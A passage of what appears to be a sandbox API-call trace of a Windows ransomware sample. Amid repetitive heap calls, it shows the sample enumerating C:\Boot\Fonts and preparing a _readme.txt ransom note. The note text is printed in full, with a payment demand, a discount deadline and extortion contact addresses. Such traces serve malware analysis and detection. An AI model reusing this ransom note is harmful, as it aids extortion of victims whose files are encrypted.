Size=0x20) returned 0x2ad7798 [0180.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.072] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0180.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.073] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0180.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.073] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.073] PathFindFileNameW (pszPath="") returned="" [0180.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.073] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0180.074] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0180.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0180.074] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0180.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0180.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.075] FreeLibrary (hLibModule=0x759a0000) returned 1 [0180.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x2ac3dd0 [0180.076] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0180.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.076] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 0 [0180.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae1ea0 [0180.077] lstrcpyW (in: lpString1=0x2ae1ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0180.077] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0180.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0180.077] CreateFileW (lpFileName="C:\\Boot\\Fonts\\_readme.txt" (normalized: "c:\\boot\\fonts\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0180.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1ea0 | out: hHeap=0x2c0000) returned 1 [0180.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.079] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*" (normalized: "c:\\boot\\fonts\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95768820, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.080] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95768820, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.080] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9571c560, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0180.080] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9571c560, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0180.080] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957426c0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x957426c0, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0180.080] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957426c0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x957426c0, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0180.080] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95768820, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0180.080] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95768820, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0180.080] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0180.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0180.081] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.088] RtlAllocateHeap 